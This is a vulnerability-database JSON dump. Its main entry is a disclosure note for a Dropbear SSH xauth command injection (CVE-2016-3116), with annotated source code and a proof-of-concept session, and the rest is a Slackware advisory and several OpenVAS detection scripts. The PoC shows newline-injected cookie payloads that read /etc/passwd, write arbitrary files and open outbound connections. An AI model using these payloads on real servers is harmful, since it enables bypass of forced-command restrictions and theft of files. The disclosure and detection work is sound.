Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115", "CVE-2016-3116"], "modified": "2016-03-03T00:00:00", "id": "EXPLOITPACK:F92411A645D85F05BDBD274FD222226F", "href": "", "sourceData": "VuNote\n============\n\n\tAuthor:\t\t<github.com/tintinweb>\n\tRef:\t\thttps://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\n\tVersion: \t0.2\n\tDate: \t\tMar 3rd, 2016\n\t\n\tTag:\t\tdropbearsshd xauth command injection may lead to forced-command bypass\n\nOverview\n--------\n\n\tName:\t\t\tdropbear\n\tVendor:\t\t\tMatt Johnston\n\tReferences:\t\t* https://matt.ucc.asn.au/dropbear/dropbear.html [1]\n\t\n\tVersion:\t\t2015.71\n\tLatest Version:\t2015.71\n\tOther Versions:\t<= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)\n\tPlatform(s):\tlinux\n\tTechnology:\t\tc\n\n\tVuln Classes:\tCWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\n\tOrigin:\t\t\tremote\n\tMin. Privs.:\tpost auth\n\n\tCVE:\t\t\tCVE-2016-3116\n\n\n\nDescription\n---------\n\nquote website [1]\n\n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers.\n\nSummary \n-------\n\nAn authenticated user may inject arbitrary xauth commands by sending an\nx11 channel request that includes a newline character in the x11 cookie. \nThe newline acts as a command separator to the xauth binary. This attack requires \nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.\n\nBy injecting xauth commands one gains limited* read/write arbitrary files, \ninformation leakage or xauth-connect capabilities. These capabilities can be\nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \naccount restriction. This is generally not expected.\n\nThe injected xauth commands are performed with the effective permissions of the \nlogged in user as the sshd already dropped its privileges. \n\nQuick-Info:\n\n* requires: X11Forwarding yes\n* does *NOT* bypass /bin/false due to special treatment (like nologin)\n* bypasses forced-commands (allows arbitr. read/write)\n\nCapabilities (xauth):\n\n* Xauth\n\t* write file: limited chars, xauthdb format\n\t* read file: limit lines cut at first \\s\n\t* infoleak: environment\n\t* connect to other devices (may allow port probing)\n\n\nsee attached PoC\n\n\nDetails\n-------\n\n// see annotated code below\n\n\t* x11req (svr-x11fwd.c:46)\n \n * execchild (svr-chansession.c:893)\n *- x11setauth (svr-x11fwd.c:129)\n\nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request\nparameters `x11authprot` and `x11authcookie` from the client ssh packet where\n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\nand `x11authcookie` contains the actual x11 auth cookie. This information is stored\nin a session specific datastore. When calling `execute` on that session, dropbear will\ncall `execchild` and - in case it was compiled with x11 support - setup x11 forwarding\nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`.\nNote that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\n`xauth` commands.\n\nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth\ncommand injection:\n\n\tSYNOPSIS\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\n\n\t\tadd displayname protocolname hexkey\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\n\t\t[n]extract filename displayname...\n\t\t[n]list [displayname...]\n\t\t[n]merge [filename...]\n\t\tremove displayname...\n\t\tsource filename\n\t\tinfo \n\t\texit\n\t\tquit\n\t\tversion\n\t\thelp\n\t\t?\n\t\t\nInteresting commands are:\n\t\n\tinfo\t - leaks environment information / path\n\t\t\t~# xauth info\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\tAuthority file: /root/.Xauthority\n\t\t\tFile new: yes\n\t\t\tFile locked: no\n\t\t\tNumber of entries: 0\n\t\t\tChanges honored: yes\n\t\t\tChanges made: no\n\t\t\tCurrent input: (argv):1\n\t\n\tsource\t - arbitrary file read (cut on first `\\s`)\n\t\t\t# xauth source /etc/shadow\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\n\t\t\t\t\t\t\n\textract - arbitrary file write \n\t\t\t * limited characters\n\t * in xauth.db format\n\t * since it is not compressed it can be combined with `xauth add` to \n\t first store data in the database and then export it to an arbitrary\n\t location e.g. to plant a shell or do other things.\n\t\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\n\t\t\t vulnerabilities in X.org\n\t\n\t\nSource\n------\n\nInline annotations are prefixed with `//#!`\n\n* handle x11 request, stores cookie in `chansess`\n\t```c\n\t/* called as a request for a session channel, sets up listening X11 */\n\t/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */\n\tint x11req(struct ChanSess * chansess) {\n\t\n\t\tint fd;\n\t\n\t\t/* we already have an x11 connection */\n\t\tif (chansess->x11listener != NULL) {\n\t\t\treturn DROPBEAR_FAILURE;\n\t\t}\n\t\n\t\tchansess->x11singleconn = buf_getbyte(ses.payload);\n\t\tchansess->x11authprot = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\n\t\tchansess->x11authcookie = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\n\t\tchansess->x11screennum = buf_getint(ses.payload);\n\t```\n\t\n* set auth cookie/authprot\n\n\t```c\n\t/* This is called after switching to the user, and sets up the xauth\n\t * and environment variables. */\n\tvoid x11setauth(struct ChanSess *chansess) {\n\t\n\t\tchar display[20]; /* space for \"localhost:12345.123\" */\n\t\tFILE * authprog = NULL;\n\t\tint val;\n\t\n\t\tif (chansess->x11listener == NULL) {\n\t\t\treturn;\n\t\t}\n\t\n\t\t...\n\t\n\t\t/* popen is a nice function - code is strongly based on OpenSSH's */\n\t\tauthprog = popen(XAUTH_COMMAND, \"w\");\t\t\t\t\t\t\t\t\t\t//#! run xauth binary\n\t\tif (authprog) {\n\t\t\tfprintf(authprog, \"add %s %s %s\\n\",\n\t\t\t\t\tdisplay, chansess->x11authprot, chansess->x11authcookie);\t\t//#! \\n injection in cookie, authprot\n\t\t\tpclose(authprog);\n\t\t} else {\n\t\t\tfprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND);\n\t\t}\n\t}\n\t```\n\nProof of Concept\n----------------\n\nPrerequisites: \n\n* install python 2.7.x\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\n* run `poc.py`\n\nNote: see cve-2016-3115 [3] for `poc.py`\n\n\t Usage: <host> <port> <username> <password or path_to_privkey>\n\t \n\t path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\n\t \n\npoc:\n\n1. configure one user (user1) for `force-commands`:\n\t```c \n\t#PUBKEY line - force commands: only allow \"whoami\"\n\t#cat /home/user1/.ssh/authorized_keys\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\n\n\t#cat /etc/passwd\n\tuser1:x:1001:1001:,,,:/home/user1:/bin/bash\n\t```\n\t \n2. run dropbearsshd (x11fwd is on by default)\n\n\t```c\n\t#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222\n\t[22861] Not backgrounding\n\t[22862] Child connection from 192.168.139.1:49597\n\t[22862] Forced command 'whoami'\n\t[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597\n\t```\t\n\n3. `forced-commands` - connect with user1 and display env information\n\n\t```c\n\t#> python <host> 2222 user1 .demoprivkey\n\t\n\tINFO:__main__:add this line to your authorized_keys file: \n\t#PUBKEY line - force commands: only allow \"whoami\"\n\t#cat /home/user/.ssh/authorized_keys\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\n\t\n\tINFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222\n\tINFO:__main__:connected!\n\tINFO:__main__:\n\tAvailable commands:\n\t .info\n\t .readfile <path>\n\t .writefile <path> <data>\n\t .exit .quit\n\t <any xauth command or type help>\n\t\n\t#> .info\n\tDEBUG:__main__:auth_cookie: '\\ninfo'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:Authority file: /home/user1/.Xauthority\n\tFile new: no\n\tFile locked: no\n\tNumber of entries: 2\n\tChanges honored: yes\n\tChanges made: no\n\tCurrent input: (stdin):2\n\tuser1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t\n\t...\n\t```\n\t\n4. `forced-commands` - read `/etc/passwd`\n\n\t```c\n\t...\n\t#> .readfile /etc/passwd\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\n\tsync:x:4:65534:sync:/bin:/bin/sync\n\t...\n\t```\n\t\t\n5. `forced-commands` - write `/tmp/testfile`\n\n\t```c\n\t#> .writefile /tmp/testfile1 `thisisatestfile`\n\tDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\n\tDEBUG:__main__:dummy exec returned: None\n\tDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500'\n\tDEBUG:__main__:dummy exec returned: None\n\tDEBUG:__main__:user1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t\n\t#> INFO:__main__:/tmp/testfile1\n\t\n\t#> ls -lsat /tmp/testfile1\n\t4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1\n\t\n\t#> cat /tmp/testfile1\n\t\u00fa65500hi\u00fa65500`thisisatestfile`\u00aar\n\t```\n\t\n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100\n\n\t```c\n\t#> generate 8.8.8.8:100\n\tDEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:user1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t/usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\".\n\t\n\t#> tcpdump \n\tIP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0\n\t```\t\n\nFix\n---\n\n* Sanitize user-tainted input `chansess->x11authcookie`\n\n\nMitigation / Workaround\n------------------------\n\n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`\n\nNotes\n-----\n\nThanks to the OpenSSH team for coordinating the fix!\n\nVendor response see: changelog [4]\n\n\nReferences\n----------\n\n\t[1] https://matt.ucc.asn.au/dropbear/dropbear.html\n\t[2] http://linux.die.net/man/1/xauth\n\t[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/\n\t[4] https://matt.ucc.asn.au/dropbear/CHANGES\n\t\nContact\n-------\n\n\thttps://github.com/tintinweb", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:34", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/openssh-7.2p2-i486-1_slack14.1.txz: Upgraded.\n This release fixes a security bug:\n sshd(8): sanitise X11 authentication credentials to avoid xauth\n command injection when X11Forwarding is enabled.\n For more information, see:\n http://www.openssh.com/txt/x11fwd.adv\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3115\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.2p2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.2p2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.2p2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.2p2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.2p2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.2p2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.2p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.2p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.2p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.2p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.2p2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.2p2-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nb972be1994a7ad698b480314dda8215c openssh-7.2p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\naa409bb0ad9c425e16275ff5a5dec8b8 openssh-7.2p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n2bcb8da4c750b54560a36306b72874d1 openssh-7.2p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n523287f90f00c280fad6e6de884d8ba8 openssh-7.2p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\nd8276fcb0533d1871fa85d1eb4cd29b6 openssh-7.2p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nef9a81022cc622a405038d64508ab4da openssh-7.2p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n9a1707edf5463bb8561d4342b193db6c openssh-7.2p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nd5bfb6d017ba5ace51aeb19a348793e0 openssh-7.2p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\naede849b3dacd510823c57f48f97b562 openssh-7.2p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n28a23b53f4b0ad1d39c174d85e434147 openssh-7.2p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n09af232cbf886c9cda11a774d753f87f n/openssh-7.2p2-i586-1.txz\n\nSlackware x86_64 -current package:\naeba7a5c4d0a91e5e35c9590b9c1d029 n/openssh-7.2p2-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg openssh-7.2p2-i486-1_slack14.1.txz\n\nNext, restart the sshd daemon:\n > sh /etc/rc.d/rc.sshd restart", "modified": "2016-03-11T01:32:41", "published": "2016-03-11T01:32:41", "id": "SSA-2016-070-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.517960", "type": "slackware", "title": "[slackware-security] openssh", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310807983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807983", "type": "openvas", "title": "Fedora Update for gsi-openssh FEDORA-2016-08", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gsi-openssh FEDORA-2016-08\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807983\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:18:35 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gsi-openssh FEDORA-2016-08\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gsi-openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gsi-openssh on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-08\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"gsi-openssh\", rpm:\"gsi-openssh~7.2p2~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-03-17T22:57:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-03-17T00:00:00", "id": "OPENVAS:1361412562310120658", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120658", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-668)", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120658\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 16:05:02 +0200 (Thu, 17 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-668)\");\n script_tag(name:\"insight\", value:\"It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions.\");\n script_tag(name:\"solution\", value:\"Run yum update openssh to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-668.html\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"auth\", rpm:\"auth~0.9.3~9.23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-ldap\", rpm:\"openssh-ldap~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-04-26T00:00:00", "id": "OPENVAS:1361412562310807942", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807942", "type": "openvas", "title": "Fedora Update for gsi-openssh FEDORA-2016-188267", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gsi-openssh FEDORA-2016-188267\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807942\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-26 05:18:22 +0200 (Tue, 26 Apr 2016)\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gsi-openssh FEDORA-2016-188267\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gsi-openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gsi-openssh on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-188267\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183122.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"gsi-openssh\", rpm:\"gsi-openssh~7.2p2~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-03-10T18:54:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "openssh xauth command injection may lead to forced-command and\n /bin/false bypass", "modified": "2020-03-06T00:00:00", "published": "2016-03-21T00:00:00", "id": "OPENVAS:1361412562310105581", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105581", "type": "openvas", "title": "OpenSSH <= 7.2p1 - Xauth Injection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSH <= 7.2p1 - Xauth Injection\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openbsd:openssh\";\n\nif(description)\n{\n 